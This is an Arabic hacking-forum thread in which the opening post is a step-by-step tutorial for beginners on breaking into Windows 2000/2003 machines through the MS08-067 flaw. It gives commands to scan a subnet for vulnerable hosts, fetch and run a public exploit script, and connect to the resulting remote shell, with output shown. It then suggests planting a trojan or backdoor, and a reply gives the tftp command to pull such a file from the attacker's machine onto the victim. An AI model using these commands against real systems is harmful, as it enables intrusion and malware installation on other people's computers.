شرح تغرة Ms08-067 - عالم المعرفة - Group XP

dr_pc · 02-07-2009, 10:06 PM

السلام عليكم ورحمة الله وبراكاته
اول شرح فى المنتدى الرائع اشكر اخوى العزيز سنايبر على المنتدى الرائع.
الشرح موجه للمبتدئين فى الاختراق عن طريق التغرة الموجودة فى الميل ورم
رابط التغرة
http://milw0rm.com/exploits/7132
معلومات عن التغرة
التغرة عبارة عن تنفيد اوامر عن بعد فى انظمة ويندوزWindows 2000 و Windows 2003 SP2 عن طريق منفد 445
مادا تحتاج لتنفيد التغرة
1.لينكس
2.Nmap اداة لعمل سكان للمنافد المفتوحة
python.3 لغة برمجة موجود فى اغلبت انظمة لينكس
اولا نقوم بدخول الترمينال او الصدفة ونعمل الاتى طبعا

كود:

hacker / # svn co --username guest --password "" svn://svn.insecure.org/nmap-exp/ron

كود:

hacker  / # cd ron/nmap-smb

كود:

hacker nmap-smb # ./configure

كود:

hacker  nmap-smb # make

كود:

hacker  nmap-smb # make install

طبعا كله واضح الفوق قمنا بعملية بناء الاداة واضافة موديلز للبحت عن الاجهزة المصابة يعنى عندما نقوم بعملية الفحص اداة النامب تقول لك ادا كان الجهاز مصاب ام لا وفحص كامل للشبكة يعنى نعمل فحص على اكتر من ايبى ip
الحين نسوى فحص با الامر التالى

كود:

hacker ron # nmap -T insane --script smb-check-vulns.nse  -p 445 192.168.1.0/24

النتجة حتكون بعد اتمام الفحص

كود:

Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
Interesting ports on firewall.localhost.com (192.168.1.1):
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)

Interesting ports on 192.168.1.127:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds

Interesting ports on 192.168.1.128:
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:04:4B:18:69:8A (Nvidia)

Interesting ports on 192.168.1.237:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:4A:B6:6D (VMware)

Host script results:
|_ smb-check-vulns: This host is vulnerable to MS08-067

Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 second

s
متل ما شوفنا فوق احدى الاجهزة مصابة با التغرة 192.168.1.237 445/tcp open
الحين نقوم بجلب التغرة من الميل ورم

كود:

hacker / # wget http://www.milw0rm.com/exploits/download/7132.py
--13:45:35--  http://www.milw0rm.com/exploits/download/7132.py
           => `7132.py'
Resolving www.milw0rm.com... 76.74.9.18
Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    [ <=>                              ] 7,085         --.--K/s             

13:45:35 (233.53 KB/s) - `7132.py' saved [7085]

استخدامنا امر wget لجلب التغرة
الحين نقوم بتنفيد التغرة

كود:

hacker / # python 7132.py 192.168.1.237 2

كما نرا احنا استخدمنا رقم 2 لانو السيرفر المصاب Windows 2003SP2 لو كان Windows 2000 نقوم بتغير الرقم 2 الى واحد 1
الناتج بعد التنفيد

كود:

#######################################################################
#   MS08-067 Exploit by Debasis Mohanty (aka tr0y/nopsled)
#   www.hackingspirits.com
#   www.coffeeandsecurity.com
#   Email: d3basis.m0hanty @ gmail.com
#######################################################################

[-]Windows 2003[SP2] payload loaded
[-]Initiating connection
[-]connected to ncacn_np:192.168.1.237[\pipe\browser]
[-]Exploit sent to target successfully...
[1]Telnet to port 4444 on target machine...

الحين كل شى تمام نجرب نعمل telnet لى الضحية عن طريق المنفد 4444

كود:

hacker / # telnet 192.168.1.237 4444
trying 192.168.1.237...
Connected to 192.168.1.237.
Escape character is '^]'.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

زى ما احنا شايفين دخلنا على الجهاز واصبح تحت السيطرة ممكن تقوم بزرع تروجن او باكدور عن طريق تحميله با الاداة TFTP وتنفيده.
الى هناء انتهاء الدرس وان شاء الله يكون مفهوم
تحياتى dr_pc

ا

Dra Alsunna · 02-07-2009, 10:33 PM

يعطيك العافيه شرح مفصل ومتعوب عليه ماقصرت والله
لكن عندي سؤال

اقتباس:

ممكن تقوم بزرع تروجن او باكدور عن طريق تحميله با الاداة Tftp وتنفيده.
الى هناء انتهاء الدرس وان شاء الله يكون مفهوم

ياليت تفصل لنا هالنقطه اكثر جزاك الله خير
والسؤال الثاني لو نبي نرفع شل على سيرفر الوندوز كيف راح يكون الامر ؟
شاكر لك ومقدر
والسلام عليكم

SnIpEr_H · 02-08-2009, 03:15 PM

وعليكم السلام .. ياهلا والله بالغالي نورت المنتدى وماشاء الله اول مشاركه درس

يعطيك العافيه دكتور وماقصرت وحياك الله في المنتدى واتمنى تفيد وتستفيد إن شاء الله

اقتباس:

مادا تحتاج لتنفيد التغرة
1.لينكس

انا للحين مانزلت نسخه وكل فتره اقول بكره

لكن قريب إن شاء الله نزل نسخه

والشرح واضح وجميل .. إلى الأمام dr-pc

والسلام عليكم

the_a_n_g · 02-09-2009, 12:10 PM

إلى الأمام أخي تسلم

dr_pc · 02-09-2009, 03:22 PM

الاخ Dra Alsunna الله يعافيك ويخليك بنسبة لبرنامج Tftpd32 هوا عبارة عن برنامج متل ftp
لزم يكون فى الجهاز تبعك طريقة تحميل شيل او برنامج اختراق لى جهاز الضحية عن طريق الامر التالى
tftp -i myip get file.exe
طبعا الامر تقوم بتنفيد لما تبدا داخل جهازه ولزم ترفع الشيل او التروجن فى نفس المسار يلى موجود فيه مسارك غير myip للا ايبى جهازك وغير file.exe الى ملف الشيل او التروجون.

اهلا اخوى SnIpEr_h سنايبر حياك الله ومشكور على مرورك الكريم
اه لينكس جميل لانوا بيه اغلب الادوات وان شاء الله اخليك تركبه الاسبوع ده

الاخ the_a_n_g
الله يسلمك وخليك شكرا على مرورك الكريم

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
انكشفت ثغرة سحب الشآدو للسيرفر	SnIpEr_H	أمن المواقع والسيرفرات	34	04-18-2010 01:29 PM
ثغرة WebStudio CMS	أبوتركي	منتدى المشاكل وحلول و الطلبات والأسئلة	5	04-07-2009 07:13 PM
ثغرة قراءة الشادو في : DirectAdmin Control Panel	SCORPION TEAM	مكتبة الثغرات	2	03-28-2009 01:03 AM
ثغرة تمويه في الرابط	the_a_n_g	مكتبة الثغرات	4	01-31-2009 02:34 AM

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق